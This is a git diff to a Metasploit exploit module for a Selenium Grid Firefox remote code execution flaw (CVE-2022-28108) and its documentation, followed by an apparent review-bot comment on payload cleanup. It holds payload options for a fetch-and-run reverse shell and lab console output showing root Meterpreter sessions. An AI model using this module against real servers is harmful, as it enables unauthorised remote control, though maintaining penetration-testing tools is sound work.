diff --git a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
index 7b47aaeeba..8a0f67975e 100644
--- a/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
+++ b/documentation/modules/exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108.md
@@ -55,8 +55,8 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
 Name Current Setting Required Description
 ---- --------------- -------- -----------
 FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
- FETCH_DELETE false yes Attempt to delete the binary after execution
- FETCH_FILENAME vryeXadl no Name to use on remote system when storing payload; cannot contain spaces or slashes
+ FETCH_DELETE true yes Attempt to delete the binary after execution
+ FETCH_FILENAME STduFkVLXVH no Name to use on remote system when storing payload; cannot contain spaces or slashes
 FETCH_SRVHOST no Local IP to use for serving payload
 FETCH_SRVPORT 8080 yes Local port to use for serving payload
 FETCH_URIPATH no Local URI to use for serving payload
@@ -79,8 +79,7 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1
 [*] Started reverse TCP handler on 192.168.56.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable
-[+] Deleted /GsDqXNZBxmLv
-[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:44250) at 2024-12-29 11:53:58 +0900
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:58392) at 2024-12-29 12:27:12 +0900
 meterpreter > getuid
 Server username: root
@@ -99,8 +98,7 @@ msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=1
 [*] Started reverse TCP handler on 192.168.56.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation.
-[+] Deleted /poYThRAaVWqQ
-[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59596) at 2024-12-29 11:56:25 +0900
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59150) at 2024-12-29 12:31:50 +0900
 meterpreter > getuid
 Server username: root
diff --git a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
index b3826eb071..3c7dd7036d 100644
--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpClient
- include Msf::Exploit::FileDropper
 prepend Msf::Exploit::Remote::AutoCheck
 def initialize(info = {})
@@ -45,6 +44,9 @@ class MetasploitModule < Msf::Exploit::Remote
 }
 ],
 ],
+ 'DefaultOptions' => {
+ 'FETCH_DELETE' => true
+ },
 'DefaultTarget' => 0,
 'DisclosureDate' => '2022-04-18',
 'Notes' => {
@@ -124,8 +126,6 @@ class MetasploitModule < Msf::Exploit::Remote
 session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId']
 fail_with(Failure::Unreachable, 'Failed to start session') unless session_id
- register_files_for_cleanup("/#{datastore['FETCH_FILENAME']}")
-
 b64encoded_payload = Rex::Text.encode_base64(
 "rm -rf $0\n"\
 "if sudo -n true 2>/dev/null; then\n"\
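Review bot: The added `'DefaultOptions' => { 'FETCH_DELETE' => true }` entry in the `.rb` hunk at `-45,6 +44,9` becomes the module's only cleanup path, and nothing in the new code says so or covers the case where the option is overridden. The other two hunks of this file drop `Msf::Exploit::FileDropper` and the `register_files_for_cleanup` call. If an operator sets `FETCH_DELETE` to false, or the delete does not succeed on the host, the fetched binary presumably stays on the tested system, and the documented output no longer has a `[+] Deleted` line to confirm removal. I would add a comment above the entry, `# Cleanup is delegated to the fetch payload via FETCH_DELETE; FileDropper is no longer used`, and check that the `'Notes'` side effects list `ARTIFACTS_ON_DISK`. The `'Notes'` hash and the rest of the `initialize` info hash lie outside this hunk, so I cannot tell whether that is already declared.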